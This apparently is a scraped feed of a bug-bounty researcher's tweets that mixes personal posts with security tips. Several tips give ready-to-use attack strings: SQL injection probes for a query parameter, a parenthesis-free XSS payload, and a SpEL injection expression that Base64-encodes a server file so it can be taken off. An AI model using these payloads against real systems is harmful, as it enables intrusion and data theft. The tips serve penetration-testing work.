This is how I found sql-Injection 100% of the time For site.com/?q=HERE /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips

JS Payload w/o Parentheses #XSS [].pop.constructor`alert\x281\x29``` brutelogic.com.br/gym.php?p05=%3…

If you can get SpEL injection but can't get RCE, try exfiltrating a file with B64 encoding: T(java.util.Base64).getEncoder().encodeToString(T(org.apache.commons.io.FileUtils).readFileToString('/proc/self/cmdline').getBytes())

Happy independence day 🙌🏼

My grandfather, The late Dhananjay kar spent 14 years of his life in cellular Jail, infamously known as kalapani. The freedom of india didn't came so easily, we "the new generation" will never understand the struggle behind it. #IndependenceDay #IndiaAt75 #स्वतंत्रतादिवस

Rick and morty 1000 years.

Hard work, new car 🙂🧘

Our Pre-Auth RCE exploit for Atlassian Confluence (CVE-2021–26084) was leaked after reporting it to VMware. They have refused to admit the leak and ignored our emails. tradahacking.vn/atlassian-conf…

Just created a working POC for CVE-2021-40444 with folks EG CERT

Exploiting Redis Through SSRF Attack infosecwriteups.com/exploiting-red…

hashcat -w 4

github.com/jmdx/TLS-poiso… This is fucking bananas and I can't believe I missed it.

Nice one!

⚙️ A lesser known tool, Osmedeus is the closest to Nuclei, that comes with an amazing web UI. You can use custom YAML workflows and vulnerability signatures just like Nuclei. 🔗 github.com/j3ssie/Osmedeus #bugbounty #bugbountytips #infosec #cybersecurity #Pentesting

If you’re around for Black Hat Asia Singapore ( April 1-4 ), let’s catch up!